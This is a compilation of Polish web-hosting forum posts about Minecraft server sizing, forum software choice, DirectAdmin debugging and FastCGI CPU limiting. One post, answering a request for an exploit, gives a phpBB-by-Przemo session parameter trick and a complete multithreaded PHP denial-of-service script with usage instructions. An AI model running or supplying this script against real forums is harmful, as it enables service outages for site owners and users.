t4t4v4

Haha "Najlepiej i7"

Jak chcesz Pan ciągnąć MC to polecam się przerzucić na serwerowe Xeon'y a nie deskoptowe procesory..

Bierz kolejny "level" z OVH: https://www.ovh.pl/serwery_dedykowane/eg_ssd.xml - nie będziesz narzekać, że coś tnie.

Łącze nie problem, MC wymaga super pingów.

Na 1Mbps przypada 8 graczy - ciągle aktywnych, kopiących, wyrzucających przedmioty, piszących, budujących itp itd - testowane na produkcyjnym, prywatnym serwerze.

Oranie dysku, problem z IO? Wystarczy przeznaczyć 2-3GB RAM pod ramdysk i wrzucać tam mapy świata - a to zrzucać co 5-10 minut na HDD/SSD.

Jeden gracz to 54MB RAMu - tak wychodzi rzeczywiście, przy serwerze pełnym wtyczek i graczy. Teoretycznie zakłada się 64MB/gracz.

Strzelam, że 3TB transferu wystarczą, zawsze można dokupić

Możesz podać chociaż jeden exploit na aktualną wersję? )

 

Ja bym wybrał myBB.

Vulnerability in cookie "_sid" and method GET sid:
http://example.com/login.php?sid[]=
or put to the cookie "_sid":
bb8536eb00_sid[]=12345

DoS:

<?php
################################################################################
# Exploit Title:		 phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit1
#
# Software			   phpBB modified by Przemo 1.12.6p4
# Date:				  2010-04-29
# Author:				GLOBUS
# Software Link:		 http://www.przemo.org/phpBB2/
# Version:			   <= 1.12.6p4
# category:			  DoS
#
# Greetz:				hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka
################################################################################
// cURL and PHP5
function info()
{
echo "##################################################################\n";
echo "# phpBB modified by Przemo <= 1.12.6p4 Denial Of Service Exploit1\n";
echo "# Author: GLOBUS\n";
echo "# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka\n";
echo "##################################################################\n";
echo "# php dos.php URL THREADS TIMEOUT\n";
echo "# php dos.php http://www.example.pl/phpbb/ 20 5\n";
echo "##################################################################\n";
exit;
}
if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))
{
info();
}
$url = $argv[1];
$threads = (int) $argv[2];
$timeout = (int) $argv[3];
$ptimeout = $timeout * 100;
$packet = implode('+', range(100,999));
while(1)
{
$m = curl_multi_init();
for($i = 0; $i < $threads; $i++)
{
 $c[$i] = curl_init();
 $opts = array
 (
  CURLOPT_URL  => $url . 'search.php?mode=results',
  CURLOPT_USERAGENT => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',
  CURLOPT_ENCODING => 'gzip, deflate',
  CURLOPT_POST  => 1,
  CURLOPT_POSTFIELDS => 'search_keywords='. $packet .'&search_terms=all&search_author=&search_time=0&search_fields=all&show_results=posts&sort_by=2&sort_dir=DESC&return_chars=-1',
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_TIMEOUT  => $timeout,
 );
 curl_setopt_array($c[$i], $opts);
 curl_multi_add_handle($m, $c[$i]);
}
$t = 0;
do
{
 curl_multi_exec($m, $r);
 usleep(100000);
 $t++;
 if($t > $ptimeout)
 {
  curl_multi_close($m);
  for($i = 0; $i < $threads; $i++)
  {
curl_close($c[$i]);
  }
  break;
 }
}
while($r > 0);
echo '.';
}
?>

Na wersji 1.12.6p4 działały oba a z tego co wiem to najnowsza wersja.

Co do DoSa to można go było prosto wyciąć przez nałożenie limitu na MySQL czy nawet banowanie na kilka minut takiego delikwenta, który stosuje generuje tyle żądań.

Miłego weekendu!

@Up a czy to coś dziwnego, że DC wycinają IPki po otrzymaniu maila?

Zresztą..

Sztuczny ruch pakietów (DoS, DDoS) powinien zostać po drodze trasy pomiędzy atakującym a Twoim serwerem, jeśli tak nie jest to pisze się do ATMAN'a prośbę o wycięcie tego adresu.

Kafi mógłbyś powiedzieć coś więcej na ten temat? Masz na myśli możliwość ograniczania IO/s dla danej maszyny wirtualnej?

Jeśli postawimy mapę świata na zwykłych HDD, nawet w RAID0 (oczywiście setki graczy) to serwer nam wygeneruje tak dużą ilość IO, że wszystko się pozatyka. Wiem to zarówno z własnych doświadczeń i testów jak i z tego co można przeczytać w Internecie.

Dyski SSD radzą sobie już znacznie lepiej z utrzymywaniem mapy, jednak też wypada je mieć w macierzy co by jeszcze bardziej przyspieszyć operacje odczytu i zapisu.

Zdecydowanie najlepszym rozwiązaniem jest skorzystanie z ramdysku i przeznaczenie np. 4GB pamięci RAM tylko i wyłącznie na światy serwera i zgrywanie ich raz na 15 minut na HDD. Opisałem to na wielu forach i "sprzedałem" taki pomysł wielu ludziom - serwery przestały mulić, mogły obrobić większą ilość graczy w tym samym czasie, komfort gry znacznie wzrósł.

EDIT: Jeśli to są VPSy od OVH to pewnie stoją w jakimś klastrze i MineCraft nie powinien być dla nich problemem

Pisząc to co wyżej miałem na myśli serwery gier postawione na jednej fizcznej maszynie.

@mikorol patrz Ty się, nawet PHP uciągnąłem przy takiej ilości pamięci

@Misiek08 popieram, sam mam tak zrealizowane trzymanie kilku malutkich stronek i sprawuje się elegancko.

KVM to typ wirtualizacji opartej o jądro systemu Linux.

Można prosić o linka do oferty?

Jeśli będzie na tych maszynach masa bezmózgich administratorów MineCrafta to strzelam, że dyski zostaną zajechane a właściciele oferty zabronią stawiania MC ^^

Tylko i wyłącznie phpBB3

Na Przemka istnieje masa explotiów wykorzystujących błędy w wywołaniach do MySQL i łatwo go zatkać.

phpBB3 daje Ci zdecydowanie większą szybkość, bezpieczeństwo i łatwość w instalacji szerokiej gamy modyfikacji i szablonów.

CloudFlare to super rozwiązanie dla dostawców hostingu.

Można używać dużo słabszych maszyn, gdyż CF cache'uje nam strony i obniża ilość odwołań do głównego serwera WWW.

CF ukrywa także nasz prawdziwy adres IP przez co można uniknąć ataków typu DDoS.

CF pomaga w przenoszeniu się między serwerami (a raczej adresami), gdyż natychmiastowo aktualizuje sobie rekordy A.

CF przestaje jednak działać, gdy ktoś pozna nasz adres i będzie atakować bezpośrednio po nim, nie używając do tego celu nazwy hosta.

Support DA pomógł:

Hello,

 

I found /usr/lib/libmysqlclient.so.16, which isn't part of our install.

 

Ours is at:

/usr/local/mysql/lib/libmysqlclient.so.16.

 

I've moved the wrong one into /root, and linked the old location to our file.

 

Now that DA is using the correct libraries, the page load works correctly.

 

Make sure that other versions of mysql are not being installed... (eg: don't use apt-get for mysql)

 

Thank you,

 

John

Problem rozwiązany, dobranoc.

Hej!

Po aktualizacji DirectAdmina do najnowszej wersji (PHP 5.3.8 i MySQL 5.5.18), gdy chcę wejść w "Zarządzanie MySQL" dostaję błąd segmentation fault.

Error log:

*** Segmentation fault *** Command::doCommand(/CMD_DB) : User: admin : 213.195.161.203 : /CMD_DB : domain=domena.pl : (null)

Zrzut pamięci (debug):

Starting program: /usr/local/directadmin/directadmin s

Direct Admin 1.40.1

Accepting Connections on port 2222

 

Program received signal SIGSEGV, Segmentation fault.

0x000000000046211a in ConfigFile::setParam(char const*, char const*) ()

(gdb) bt full

#0 0x000000000046211a in ConfigFile::setParam(char const*, char const*) ()

No symbol table info available.

#1 0x00000000004bcaf2 in Database::getRow(ConfigFile&, st_mysql_res*, int) ()

No symbol table info available.

#2 0x00000000004c504a in Database::getDBsize(char const*, st_mysql*, int) ()

No symbol table info available.

#3 0x00000000004c54d8 in Database::setDBTableToken(Send*, char const*) ()

No symbol table info available.

#4 0x000000000042aa25 in Command::doDB(char const*, char const*, char const*, int, ConfigFile*) ()

No symbol table info available.

#5 0x0000000000444396 in Command::doCommand(char const*) ()

No symbol table info available.

#6 0x0000000000446065 in Command::run(char const*) ()

No symbol table info available.

#7 0x0000000000553dbb in server() ()

No symbol table info available.

#8 0x0000000000554650 in main ()

No symbol table info available.

(gdb)

Ktoś ma pomysły jak to załatać? apt-get upgrade + custombuild php i MySQL?

Edit: Nowi użytkownicy nie mają tego błędu. Ci, którzy przeszli z wersji 1.39 mają błąd.

Witajcie!

Chcę zrobić pakiet, w którym wszyscy użytkownicy będą mieć reklamy na stronie. Więc posłużyłem się: http://www.directadmin.com/features.php?id=479 i http://help.directadmin.com/item.php?id=299

Zawartość pliku custom_package_items.conf:

reklamy=type=checkbox&string=Reklamy na stronie&desc=Reklamy na stronie&checked=no

Zaznaczanie funkcji "reklama" działa i jest dodawana linijka do pliku: /usr/local/directadmin/data/users/testowo/users.conf reklama=ON

Do niektórych plików httpd.conf zależnie od zaznaczenia opcji "reklamy" chcę dodawać następujący kod:

LayoutIgnoreURI *.rss
LayoutIgnoreURI *.xml
LayoutIgnoreURI *.raw
   AllowOverride All
   AddOutputFilter LAYOUT html htm shtml php
   LayoutComment Off
   LayoutFooter /home/reklama.html

Więc w templatkach virtual hostów dodałem pomiędzy <Directory>:

|*if reklamy="ON"|
LayoutIgnoreURI *.rss
LayoutIgnoreURI *.xml
LayoutIgnoreURI *.raw
   AllowOverride All
   AddOutputFilter LAYOUT html htm shtml php
   LayoutComment Off
   LayoutFooter /home/reklama.html
|*endif|

Gdy wrzucę użytkownikowi ręcznie kod dodający reklamę, wszystko działa. Gdy dodam nowego użytkownika z zaznaczoną "reklamą" (reklama=ON) to nie dodaje mi tego do httpd.conf

Wie ktoś o co może chodzić?

Właśnie wiedziałem, że coś z "layout" w nazwie, szukałem szukałem i mam: http://wannabe.guru.org/scott/hobbies/apache/ sposób działa w 100%. Jeszcze dziś zadam kolejne pytanie, ale to już w innym temacie.

Pozdrawiam

Witajcie!

Znacie jakiś moduł do Indianina, który doklejałby kod reklamy do stron? Tak jak ma to miejsce na yoyo.pl, cba.pl, ugu.pl i innych darmowych hostingach.

Jeśli tak, to proszę o propozycje.

Pozdrawiam!

Działa. Limity limitują hardcorowo:

Bez limitu czas wykonywania pewnego skryptu 2,7s

50% - 5,8s

5% - 50s

Miłego dzionka

To jest VPS na VMWare z jednym fizycznym rdzeniem dla mnie. Rano skompiluję sobie cpulimit, może to coś pomoże.

Jeszcze raz dzięki wszystkim za pomoc, dobrej nocki!

Panocki! Wykorzystując mój geniusz.. Joke, to wszystko dzięki Wam! Skleciłem taki skrypt z dwóch skryptów:

#!/bin/sh
for username in `ls /usr/local/directadmin/data/users`; do
{
mkdir -p /fcgi/${username}/public_html
cp /usr/local/directadmin/scripts/custom/fcgid.sh /fcgi/${username}/public_html/fcgid.sh && chmod 0700 /fcgi/${username}/public_html/fcgid.sh
cp /usr/local/directadmin/scripts/custom/php.ini /fcgi/${username}/public_html/php.ini
perl -pi -w -e "s/PHPCFG_BASEDIR/\/home\/${username}\//g;" /fcgi/${username}/public_html/php.ini
chown -R ${username}:${username} /fcgi/${username}
}
done;

Po nadaniu uprawnień wszystko ruszyło od kopa. Elegancko działa.

PHPInfo mówi:

Server API: CGI/FastCGI

Configure Command: ... '--enable-fastcgi' ...

Więc FastCGI działczy?

Może odejdę od tematu: jak nałożyć limity CPU na wykonywanie skryptów? Próbowałem tak (starter fcgid.sh):

#!/bin/sh
export PHP_FCGI_MAX_REQUESTS=0
exec cpulimit -P /usr/local/php5/bin/php-cgi -l 5

Skrypt jest wykonywany chyba w nieskończoność, strona nie ładuje się - jak zrobić to poprawnie?

Edit: Pomęczyłem, pomęczyłem i doszedłem:

#!/bin/sh
PHPRC="~"
export PHPRC
export PHP_FCGI_CHILDREN=1
exec (cpulimit -P /usr/local/php5/bin/php-cgi -l 10)

Za pomoc zapraszam do Zamościa na browarka

EDIT: Starter z CPULimit niby odpala skrypty PHP ale w ogóle nie limituje procka. Co z tym fantem zrobić?

Dobrze, różnią się uid/gid ale nie różnią się zawartością. Czy takie uruchamianie z oddzielnych starterów jest bezpieczniejsze niż z jednego wspólnego (po zmodyfikowaniu źródła suexeca)?

Właśnie, tak poza tematem (dziś w nocy jeszcze będę męczyć i dam znać) - dlaczego każdy użytkownik musi mieć oddzielny skrypt startowy (fcgid.sh) skoro one niczym się nie różnią? Mi to w sumie w niczym nie przeszkadza, ale pytam z czystej ciekawości

Nikt nigdzie nie wspominał o edycji źródła i ponownel kompilacji.. O co chodzi?

nie chmod tylko patch na suexec ....

Co masz na myśli? Co mam poprawić?

Czyli to błąd wywołany brakiem uprawnień i to powinno dopomóc:

cd /usr/local/directadmin/scripts && ./set_permissions.sh

find /home/*/domains/*/p*_html -type d -print0 | xargs -0 chmod 711
find /home/*/domains/*/p*_html -type f -print0 | xargs -0 chmod 644

W nocy popróbuję z uprawnieniami i grupami i dam znać

Już zapomnijmy o tym suPHP - pomieszało mi się kompletnie..

Powróciłem do prac nad FastCGId i wyskakuje znów 500 Internal Server Error a logi mówią:

[Tue Nov 22 01:37:08 2011] [warn] [client 178.36.208.132] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server
[Tue Nov 22 01:37:08 2011] [error] [client 178.36.208.132] Premature end of script headers: index.php

suExec log:

[2011-11-22 01:37:08]: uid: (1002/admin) gid: (1003/admin) cmd: fcgid.sh
[2011-11-22 01:37:08]: target uid/gid (1002/1003) mismatch with directory (0/0) or program (0/0)

Co z tym fantem zrobić?